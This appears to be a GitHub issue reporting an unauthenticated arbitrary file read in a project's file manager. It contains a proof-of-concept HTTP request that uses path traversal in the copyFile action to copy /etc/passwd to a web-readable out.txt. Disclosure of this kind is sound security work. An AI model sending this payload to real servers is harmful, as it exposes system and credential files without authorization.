Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
An Unauthorized attacker can read arbitrary file via copy function
POST /js/filemanager/api/index.php HTTP/1.1 Host: localhost:8888 Content-Type: application/json Origin: http://localhost:8888 Content-Length: 98 {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../out.txt","action":"copyFile"}
then visit '/out.txt'
The text was updated successfully, but these errors were encountered:
No branches or pull requests
An Unauthorized attacker can read arbitrary file via copy function
poc
then visit '/out.txt'

The text was updated successfully, but these errors were encountered: